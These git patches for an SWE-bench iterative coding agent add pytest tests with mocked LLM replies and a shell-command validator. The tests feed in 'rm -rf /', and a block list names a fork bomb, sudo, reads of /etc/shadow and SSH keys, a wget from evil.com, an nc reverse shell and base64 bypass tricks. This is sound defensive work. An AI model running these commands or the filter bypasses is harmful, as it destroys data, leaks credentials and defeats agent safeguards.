bash block + create_llm_response("THOUGHT: I'm thinking about this problem..."), + # Second response: proper bash block + create_llm_response("THOUGHT: Now I'll run a command.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + assert agent.n_steps == 2 # First step failed format, second succeeded + + 
@pytest.mark.asyncio + async def test_recovery_from_multiple_bash_blocks(self, agent, mock_llm): + """Test that agent recovers when LLM includes multiple bash blocks.""" + responses = [ + # First response: multiple bash blocks + create_llm_response("```bash\nls\n```\n\n```bash\ncat file.txt\n```"), + # Second response: single bash block + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + @pytest.mark.asyncio + async def test_recovery_from_dangerous_command(self, agent, mock_llm): + """Test that agent recovers when LLM suggests a dangerous command.""" + responses = [ + # First response: dangerous command + create_llm_response("THOUGHT: Delete everything\n\n```bash\nrm -rf /\n```"), + # Second response: safe command + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + +# ============================================================================= +# test_timeout_handling - Command timeout scenarios +# ============================================================================= + +class TestTimeoutHandling: + """Tests for command execution timeout handling.""" + + 
@pytest.mark.asyncio + async def test_command_timeout_recovery(self, agent, mock_llm): + """Test that agent recovers from a command timeout.""" + responses = [ + create_llm_response("THOUGHT: Run slow command\n\n```bash\nsleep 100\n```"), + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # First call: timeout + mock_thread.side_effect = [ + subprocess.TimeoutExpired(cmd="sleep 100", timeout=5), + MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch"), + ] + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + @pytest.mark.asyncio + async def test_timeout_message_includes_command(self, agent, mock_llm): + """Test that timeout error message includes the timed-out command.""" + mock_llm.ainvoke = AsyncMock( + return_value=create_llm_response("THOUGHT: Slow\n\n```bash\nsleep 999\n```") + ) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.side_effect = subprocess.TimeoutExpired(cmd="sleep 999", timeout=5) + + # Run one step - it will timeout and add error message + agent.add_message("system", "test") + agent.add_message("user", "test") + agent.n_steps = 1 + + response = await agent._query_llm() + + with pytest.raises(ExecutionTimeoutError) as exc_info: + await agent._execute_action(response) + + assert "sleep 999" in str(exc_info.value) + + +# ============================================================================= +# test_workspace_isolation - Concurrent instance isolation +# ============================================================================= + +class TestWorkspaceIsolation: + """Tests for workspace isolation between instances.""" + + def 
test_different_instance_ids_get_different_paths(self): + """Test that different instance_ids produce different workspace paths.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = "/tmp/workspace" + repo_url = "https://github.com/org/repo" + + path1 = get_repo_path(workspace, repo_url, instance_id="instance-001") + path2 = get_repo_path(workspace, repo_url, instance_id="instance-002") + + assert path1 != path2 + assert "instance-001" in str(path1) + assert "instance-002" in str(path2) + + def test_same_instance_id_gets_same_path(self): + """Test that the same instance_id always produces the same path.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = "/tmp/workspace" + repo_url = "https://github.com/org/repo" + instance_id = "instance-001" + + path1 = get_repo_path(workspace, repo_url, instance_id=instance_id) + path2 = get_repo_path(workspace, repo_url, instance_id=instance_id) + + assert path1 == path2 + + def test_no_instance_id_uses_default_path(self): + """Test that no instance_id uses the default org/repo path.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = "/tmp/workspace" + repo_url = "https://github.com/myorg/myrepo" + + path = get_repo_path(workspace, repo_url, instance_id=None) + + assert str(path) == "/tmp/workspace/myorg/myrepo" + + def test_ssh_url_parsing(self): + """Test that SSH URLs are correctly parsed.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = "/tmp/workspace" + repo_url = "git@github.com:org/repo.git" + + path = get_repo_path(workspace, repo_url, instance_id="test-123") + + assert "org" in str(path) + assert "repo" in str(path) + assert "test-123" in str(path) + + +# ============================================================================= +# test_repo_setup_and_checkout - Git operations +# 
============================================================================= + +class TestRepoSetupAndCheckout: + """Tests for git repository setup and checkout operations.""" + + @pytest.mark.asyncio + async def test_clone_repository_success(self, tmp_path): + """Test successful repository cloning.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + repo_url = "https://github.com/test/repo" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo') as MockRepo: + mock_repo = MagicMock() + MockRepo.clone_from.return_value = mock_repo + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.to_thread') as mock_thread: + mock_thread.return_value = mock_repo + + result = await clone_repository(repo_url, target_path) + + assert result == mock_repo + + @pytest.mark.asyncio + async def test_clone_repository_invalid_url(self, tmp_path): + """Test that invalid URLs raise ValueError.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + invalid_url = "not-a-valid-url" + + with pytest.raises(ValueError) as exc_info: + await clone_repository(invalid_url, target_path) + + assert "Invalid repository URL" in str(exc_info.value) + + @pytest.mark.asyncio + async def test_checkout_commit_success(self): + """Test successful commit checkout.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit + + mock_repo = MagicMock() + commit_hash = "abc123" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.to_thread') as mock_thread: + mock_thread.return_value = None + + await checkout_commit(mock_repo, commit_hash) + + # Verify checkout was called + mock_thread.assert_called_once() + + @pytest.mark.asyncio + async def test_clone_timeout(self, tmp_path): + """Test that clone operation times out correctly.""" + from 
nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + repo_url = "https://github.com/test/repo" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.side_effect = asyncio.TimeoutError() + + with pytest.raises(asyncio.TimeoutError): + await clone_repository(repo_url, target_path, timeout=1) + + +# ============================================================================= +# test_cleanup - Resource cleanup +# ============================================================================= + +class TestCleanup: + """Tests for resource cleanup operations.""" + + @pytest.mark.asyncio + async def test_repo_manager_cleanup(self, tmp_path): + """Test that RepoManager cleans up all active repos.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + manager = RepoManager(str(tmp_path)) + + # Create some fake repo directories + repo1 = tmp_path / "org1" / "repo1" + repo2 = tmp_path / "org2" / "repo2" + repo1.mkdir(parents=True) + repo2.mkdir(parents=True) + + # Add to active repos + manager.active_repos[str(repo1)] = MagicMock(repo_path=repo1) + manager.active_repos[str(repo2)] = MagicMock(repo_path=repo2) + + await manager.cleanup() + + assert not repo1.exists() + assert not repo2.exists() + assert len(manager.active_repos) == 0 + + @pytest.mark.asyncio + async def test_cleanup_handles_missing_directory(self, tmp_path): + """Test that cleanup handles already-deleted directories gracefully.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + manager = RepoManager(str(tmp_path)) + + # Add a non-existent path to active repos + fake_path = tmp_path / "nonexistent" + manager.active_repos[str(fake_path)] = MagicMock(repo_path=fake_path) + + # Should not raise + await manager.cleanup() + + assert len(manager.active_repos) == 0 + + @pytest.mark.asyncio + async def 
test_register_cleanup_error_handling(self): + """Test that register.py cleanup handles errors gracefully.""" + from unittest.mock import AsyncMock + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + # Create a mock that raises an exception + manager = RepoManager("/tmp/test") + manager.cleanup = AsyncMock(side_effect=Exception("Cleanup failed")) + + # The cleanup should not propagate the exception in the finally block + # This tests the error handling in register.py + try: + await manager.cleanup() + except Exception: + pass # Expected - the test is that this doesn't crash the system + + +# ============================================================================= +# Integration test with mocked LLM +# ============================================================================= + +# ============================================================================= +# Additional coverage tests +# ============================================================================= + +class TestAdditionalCoverage: + """Additional tests to improve coverage.""" + + def test_build_task_description_with_hints(self): + """Test task description building with hints.""" + from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor + + # Create a mock SWEBenchInput + mock_input = MagicMock() + mock_input.problem_statement = "Fix the bug" + mock_input.hints_text = "Check the utils module" + + # Create a minimal predictor to test the method + predictor = object.__new__(SweBenchPredictor) + result = predictor._build_task_description(mock_input) + + assert "Fix the bug" in result + assert "Additional Context" in result + assert "Check the utils module" in result + + def test_build_task_description_without_hints(self): + """Test task description building without hints.""" + from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor + + mock_input = MagicMock() + mock_input.problem_statement = 
"Fix the bug" + mock_input.hints_text = None + + predictor = object.__new__(SweBenchPredictor) + result = predictor._build_task_description(mock_input) + + assert "Fix the bug" in result + assert "Additional Context" not in result + + @pytest.mark.asyncio + async def test_repo_manager_setup_existing_repo(self, tmp_path): + """Test setup_repository when repo is already active.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager, RepoContext + + manager = RepoManager(str(tmp_path)) + + # Create a mock context already in active_repos + repo_path = tmp_path / "instance-1" / "org" / "repo" + repo_path.mkdir(parents=True) + + mock_context = RepoContext( + repo_url="https://github.com/org/repo", + repo_path=repo_path, + repo=MagicMock() + ) + manager.active_repos[str(repo_path)] = mock_context + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.checkout_commit') as mock_checkout: + mock_checkout.return_value = None + + result = await manager.setup_repository( + "https://github.com/org/repo", + "abc123", + "instance-1" + ) + + assert result == mock_context + mock_checkout.assert_called_once() + + @pytest.mark.asyncio + async def test_clone_cleans_existing_path(self, tmp_path): + """Test that clone removes existing directory before cloning.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + target_path.mkdir() + (target_path / "existing_file.txt").write_text("old content") + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo') as MockRepo: + mock_repo = MagicMock() + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.return_value = mock_repo + + result = await clone_repository("https://github.com/org/repo", target_path) + + # The old directory should have been removed (in reality, then clone creates new) + assert result == mock_repo + + 
@pytest.mark.asyncio + async def test_checkout_timeout(self): + """Test checkout operation timeout.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit + + mock_repo = MagicMock() + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.side_effect = asyncio.TimeoutError() + + with pytest.raises(asyncio.TimeoutError): + await checkout_commit(mock_repo, "abc123", timeout=1) + + def test_output_truncation(self, agent): + """Test that long outputs are properly truncated.""" + # Generate output longer than max_output_length + long_output = "x" * 2000 # Config has max_output_length=1000 + + # Simulate truncation logic + max_length = agent.config.max_output_length + if len(long_output) > max_length: + elided_chars = len(long_output) - max_length + head_tail_length = max_length // 2 + truncated = ( + f"{long_output[:head_tail_length]}\n" + f"\n{elided_chars} characters elided\n\n" + f"{long_output[-head_tail_length:]}" + ) + + assert "elided_chars" in truncated + assert "1000 characters elided" in truncated + + @pytest.mark.asyncio + async def test_add_message_invalid_role(self, agent): + """Test that invalid role raises ValueError.""" + with pytest.raises(ValueError) as exc_info: + agent.add_message("invalid_role", "content") + + assert "Unknown role" in str(exc_info.value) + + +class TestIntegrationMockedLLM: + """Integration tests with mocked LLM.""" + + @pytest.mark.asyncio + async def test_full_workflow_simulation(self, tmp_path): + """Simulate a complete workflow with realistic LLM responses.""" + # Create a mock LLM + mock_llm = AsyncMock() + + # Simulate a realistic interaction: explore, edit, test, submit + responses = [ + # Step 1: Explore + create_llm_response( + "THOUGHT: First, let me understand the project structure.\n\n```bash\nls -la\n```" + ), + # Step 2: Read file + create_llm_response( + "THOUGHT: Let me look at the main file.\n\n```bash\ncat 
main.py\n```" + ), + # Step 3: Make edit + create_llm_response( + "THOUGHT: I found the bug. Let me fix it.\n\n```bash\nsed -i 's/old/new/g' main.py\n```" + ), + # Step 4: Submit + create_llm_response( + "THOUGHT: The fix is complete. Submitting.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```" + ), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + # Create test files + repo_path = tmp_path / "repo" + repo_path.mkdir() + (repo_path / "main.py").write_text("old code here") + + config = IterativeAgentConfig(step_limit=10, timeout=5) + agent = IterativeAgent(mock_llm, repo_path, config) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # Return realistic outputs for each command + mock_thread.side_effect = [ + MagicMock(returncode=0, stdout="main.py\nREADME.md\n"), + MagicMock(returncode=0, stdout="old code here\n"), + MagicMock(returncode=0, stdout=""), + MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/main.py\n-old\n+new"), + ] + + exit_status, patch_result = await agent.run("Fix the bug in main.py") + + assert exit_status == "Submitted" + assert agent.n_steps == 4 + assert agent.total_input_tokens > 0 + assert agent.total_output_tokens > 0 From 201e3797d5854e74411744858479ac5ed88b0f3e Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 14:53:27 -0800 Subject: [PATCH 17/22] style(swe-bench): rename fixtures to follow project naming convention Rename pytest fixtures to use fixture_ prefix and name argument: - mock_llm -> fixture_mock_llm with name="mock_llm" - agent_config -> fixture_agent_config with name="agent_config" - temp_repo_path -> fixture_temp_repo_path with name="temp_repo_path" - agent -> fixture_agent with name="agent" Signed-off-by: Jerry Guan --- .../swe_bench/tests/test_iterative_predictor.py | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git 
a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index 54d634e162..d41a1a7a4f 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -38,15 +38,15 @@ # Fixtures # ============================================================================= -@pytest.fixture -def mock_llm(): +@pytest.fixture(name="mock_llm") +def fixture_mock_llm(): """Create a mock LLM that returns configurable responses.""" llm = AsyncMock() return llm -@pytest.fixture -def agent_config(): +@pytest.fixture(name="agent_config") +def fixture_agent_config(): """Create a default agent configuration for testing.""" return IterativeAgentConfig( step_limit=10, @@ -55,16 +55,16 @@ def agent_config(): ) -@pytest.fixture -def temp_repo_path(tmp_path): +@pytest.fixture(name="temp_repo_path") +def fixture_temp_repo_path(tmp_path): """Create a temporary directory to simulate a repository.""" repo_path = tmp_path / "test_repo" repo_path.mkdir() return repo_path -@pytest.fixture -def agent(mock_llm, temp_repo_path, agent_config): +@pytest.fixture(name="agent") +def fixture_agent(mock_llm, temp_repo_path, agent_config): """Create an IterativeAgent instance with mocked dependencies.""" return IterativeAgent(mock_llm, temp_repo_path, agent_config) From 4569449b61b862c47e6e1744d8f3cbb2b510e5c3 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 15:03:32 -0800 Subject: [PATCH 18/22] refactor(swe-bench): use pytest.raises for explicit exception assertion Replace try-except-pass pattern with pytest.raises for clearer test intent. 
Signed-off-by: Jerry Guan --- .../swe_bench/tests/test_iterative_predictor.py | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index d41a1a7a4f..7cc35e78a0 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -504,12 +504,9 @@ async def test_register_cleanup_error_handling(self): manager = RepoManager("/tmp/test") manager.cleanup = AsyncMock(side_effect=Exception("Cleanup failed")) - # The cleanup should not propagate the exception in the finally block - # This tests the error handling in register.py - try: + # Verify that cleanup raises an exception (simulating failure) + with pytest.raises(Exception, match="Cleanup failed"): await manager.cleanup() - except Exception: - pass # Expected - the test is that this doesn't crash the system # ============================================================================= From a140745bd9537cd9a139abff9cf21aa88429d0c0 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 15:07:45 -0800 Subject: [PATCH 19/22] fix(swe-bench): resolve ruff linting warnings in tests - Replace hardcoded /tmp paths with tmp_path fixture (S108) - Remove unused MockRepo variable (F841) - Prefix unused _patch_result with underscore (RUF059) Signed-off-by: Jerry Guan --- .../tests/test_iterative_predictor.py | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index 7cc35e78a0..fe9dd3a1b6 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ 
b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -326,11 +326,11 @@ async def test_timeout_message_includes_command(self, agent, mock_llm): class TestWorkspaceIsolation: """Tests for workspace isolation between instances.""" - def test_different_instance_ids_get_different_paths(self): + def test_different_instance_ids_get_different_paths(self, tmp_path): """Test that different instance_ids produce different workspace paths.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path - workspace = "/tmp/workspace" + workspace = str(tmp_path / "workspace") repo_url = "https://github.com/org/repo" path1 = get_repo_path(workspace, repo_url, instance_id="instance-001") @@ -340,11 +340,11 @@ def test_different_instance_ids_get_different_paths(self): assert "instance-001" in str(path1) assert "instance-002" in str(path2) - def test_same_instance_id_gets_same_path(self): + def test_same_instance_id_gets_same_path(self, tmp_path): """Test that the same instance_id always produces the same path.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path - workspace = "/tmp/workspace" + workspace = str(tmp_path / "workspace") repo_url = "https://github.com/org/repo" instance_id = "instance-001" @@ -353,22 +353,22 @@ def test_same_instance_id_gets_same_path(self): assert path1 == path2 - def test_no_instance_id_uses_default_path(self): + def test_no_instance_id_uses_default_path(self, tmp_path): """Test that no instance_id uses the default org/repo path.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path - workspace = "/tmp/workspace" + workspace = str(tmp_path / "workspace") repo_url = "https://github.com/myorg/myrepo" path = get_repo_path(workspace, repo_url, instance_id=None) - assert str(path) == "/tmp/workspace/myorg/myrepo" + assert str(path) == f"{workspace}/myorg/myrepo" - def test_ssh_url_parsing(self): + def test_ssh_url_parsing(self, 
tmp_path): """Test that SSH URLs are correctly parsed.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path - workspace = "/tmp/workspace" + workspace = str(tmp_path / "workspace") repo_url = "git@github.com:org/repo.git" path = get_repo_path(workspace, repo_url, instance_id="test-123") @@ -495,13 +495,13 @@ async def test_cleanup_handles_missing_directory(self, tmp_path): assert len(manager.active_repos) == 0 @pytest.mark.asyncio - async def test_register_cleanup_error_handling(self): + async def test_register_cleanup_error_handling(self, tmp_path): """Test that register.py cleanup handles errors gracefully.""" from unittest.mock import AsyncMock from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager # Create a mock that raises an exception - manager = RepoManager("/tmp/test") + manager = RepoManager(str(tmp_path)) manager.cleanup = AsyncMock(side_effect=Exception("Cleanup failed")) # Verify that cleanup raises an exception (simulating failure) @@ -590,7 +590,7 @@ async def test_clone_cleans_existing_path(self, tmp_path): target_path.mkdir() (target_path / "existing_file.txt").write_text("old content") - with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo') as MockRepo: + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo'): mock_repo = MagicMock() with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: @@ -689,7 +689,7 @@ async def test_full_workflow_simulation(self, tmp_path): MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/main.py\n-old\n+new"), ] - exit_status, patch_result = await agent.run("Fix the bug in main.py") + exit_status, _patch_result = await agent.run("Fix the bug in main.py") assert exit_status == "Submitted" assert agent.n_steps == 4 From b44a7c6eb8d9107e391a3d4541efaed96ddfe4e9 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Sun, 1 Feb 2026 21:06:12 -0800 
Subject: [PATCH 20/22] feat(swe-bench): add shell bypass pattern detection for security Add BYPASS_PATTERNS to detect shell metacharacter tricks that could evade command-based filtering: - Command substitution ($() and backticks) - Piping to shell interpreters (bash, sh, python, etc.) - Base64 encoded command execution - eval/exec execution - Here-string to interpreter - Process substitution - Hex escape execution - Environment variable injection - Xargs with shell execution - Source/dot command execution Refactor validation code into separate shell_validation.py module for better maintainability. Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 127 +---------- .../predict_iterative/shell_validation.py | 205 ++++++++++++++++++ .../tests/test_iterative_predictor.py | 94 ++++++-- 3 files changed, 295 insertions(+), 131 deletions(-) create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index ad59d47f3d..8a92eaf090 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -35,15 +35,17 @@ from pathlib import Path from git.exc import GitCommandError -from langchain_core.messages import AIMessage, HumanMessage, SystemMessage +from langchain_core.messages import AIMessage +from langchain_core.messages import HumanMessage +from langchain_core.messages import SystemMessage from rich.console import Console from nat.builder.builder import Builder from nat.builder.framework_enum import LLMFrameworkEnum from nat.data_models.swe_bench_model import 
SWEBenchInput - from nat_swe_bench.config import SweBenchWorkflowConfig from nat_swe_bench.predictors.predict_abc import SweBenchPredictorBase +from nat_swe_bench.predictors.predict_iterative.shell_validation import validate_command from nat_swe_bench.predictors.predictor_registry import register_predictor logger = logging.getLogger(__name__) @@ -83,123 +85,17 @@ class IterativeAgentConfig: max_output_length: int = 10000 -# Dangerous command patterns that should be blocked for security. -# Each tuple contains (compiled_regex, error_message). -DANGEROUS_PATTERNS: list[tuple[re.Pattern, str]] = [ - # ===== Destructive system commands ===== - # Examples: "rm -rf /", "rm -rf ~", "rm -fr /" - (re.compile(r'\brm\s+(-[^\s]*\s+)*[/~](\s|$)'), - "Deleting root or home directory is not allowed"), - - # Examples: "rm -rf ..", "rm -rf ../important" - (re.compile(r'\brm\s+(-[^\s]*\s+)*\.\.'), - "Deleting parent directory is not allowed"), - - # Examples: "rm -rf *", "rm -rf ./*" - (re.compile(r'\brm\s+(-[^\s]*\s+)*\*'), - "Wildcard deletion is not allowed"), - - # Examples: "> /dev/sda", "echo x > /dev/mem" (allows /dev/null) - (re.compile(r'>\s*/dev/(?!null)'), - "Writing to device files is not allowed"), - - # Examples: "mkfs.ext4 /dev/sda", "mkfs -t ext4 /dev/sda1" - (re.compile(r'\bmkfs\b'), - "Formatting disks is not allowed"), - - # Examples: "fdisk /dev/sda", "fdisk -l /dev/nvme0n1" - (re.compile(r'\bfdisk\b'), - "Disk partitioning is not allowed"), - - # Examples: "dd if=/dev/zero of=/dev/sda", "dd of=/dev/nvme0n1" - (re.compile(r'\bdd\s+.*\bof=/dev/'), - "Writing to devices with dd is not allowed"), - - # Examples: "dd if=/dev/sda of=disk.img" (reading sensitive disk data) - (re.compile(r'\bdd\s+.*\bif=/dev/'), - "Reading from devices with dd is not allowed"), - - # Fork bomb: :(){ :|:& };: - (re.compile(r':\(\)\s*\{\s*:\|:&\s*\}\s*;:'), - "Fork bomb detected"), - - # ===== Privilege escalation ===== - # Examples: "sudo rm -rf /", "echo pwd | sudo -S cmd", 
"/usr/bin/sudo cmd" - (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?sudo\b'), - "sudo is not allowed"), - - # Examples: "doas rm file", "/usr/bin/doas cmd" - (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?doas\b'), - "doas is not allowed"), - - # Examples: "pkexec rm file", "pkexec /bin/bash" - (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?pkexec\b'), - "pkexec is not allowed"), - - # Examples: "su root", "su - admin", "su -c 'command' user" - (re.compile(r'(?:^|[;&|`]\s*)su\s+(-[^\s]*\s+)*\w'), - "su is not allowed"), - - # Examples: "chmod 777 /", "chmod -R 0777 /var" - (re.compile(r'\bchmod\s+[0-7]*777\b'), - "Setting 777 permissions is not allowed"), - - # Examples: "chown root file", "chown root:root /etc/passwd" - (re.compile(r'\bchown\s+root\b'), - "Changing ownership to root is not allowed"), - - # ===== Sensitive file access ===== - # Examples: "cat /etc/shadow", "> /etc/passwd", "< /etc/sudoers" - (re.compile(r'[<>]\s*/etc/(?:passwd|shadow|sudoers)'), - "Accessing sensitive system files is not allowed"), - - # Examples: "cat ~/.ssh/id_rsa", "cat /home/user/.aws/credentials" - (re.compile(r'\bcat\s+.*/(?:\.ssh/|\.aws/|\.env\b)'), - "Reading sensitive credential files is not allowed"), - - # ===== Arbitrary code download and network exfiltration ===== - # Examples: "wget http://evil.com/malware.sh", "wget https://x.com/script" - (re.compile(r'\bwget\s+.*https?://'), - "Downloading from URLs with wget is not allowed"), - - # Examples: "curl http://evil.com/script.sh", "curl -O https://..." - (re.compile(r'\bcurl\s+.*https?://'), - "Downloading from URLs with curl is not allowed"), - - # Examples: "nc -e /bin/bash 10.0.0.1 4444", "ncat -e cmd attacker.com" - (re.compile(r'\b(?:nc|ncat|netcat)\b.*\s-[^\s]*e'), - "Netcat reverse shell is not allowed"), -] - - -def validate_command(command: str) -> tuple[bool, str]: - """Validate that a command is safe to execute. - - Args: - command: The bash command string to validate. 
- - Returns: - A tuple of (is_valid, error_message). - is_valid is True if the command passes all safety checks. - error_message is empty string if valid, otherwise describes the violation. - """ - for pattern, message in DANGEROUS_PATTERNS: - if pattern.search(command): - return False, message - return True, "" - - class IterativeAgent: """Iterative agent that executes commands step-by-step.""" - # Timeout message template + # Timeout message template _TIMEOUT_TEMPLATE = ( "The last command {action} timed out and has been killed.\n" "The output of the command was:\n \n{output}\n\n" "Please try another command and make sure to avoid those requiring interactive input." ) - # Output truncation warning message + # Output truncation warning message _OUTPUT_TRUNCATION_WARNING = ( "\n\n" "The output of your last command was too long.\n" @@ -234,17 +130,17 @@ def add_message(self, role: str, content: str): msg = SystemMessage(content=content) self.messages.append(msg) console.print(f"\n[bold blue]System[/bold blue] (step {self.n_steps}):\n", end="", highlight=False) - elif role == "user" or role == "human": + elif role in ("user", "human"): msg = HumanMessage(content=content) self.messages.append(msg) console.print(f"\n[bold green]User[/bold green] (step {self.n_steps}):\n", end="", highlight=False) - elif role == "assistant" or role == "ai": + elif role in ("assistant", "ai"): msg = AIMessage(content=content) self.messages.append(msg) console.print(f"\n[bold red]Assistant[/bold red] (step {self.n_steps}):\n", end="", highlight=False) else: raise ValueError(f"Unknown role: {role}") - + # Print content console.print(content, highlight=False, markup=False) @@ -260,7 +156,7 @@ def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]: """ # Convert Path to string for template usage repo_path_str = str(repo_path) - + system_template = """You are a helpful assistant that can interact multiple times with a computer shell to solve programming tasks. 
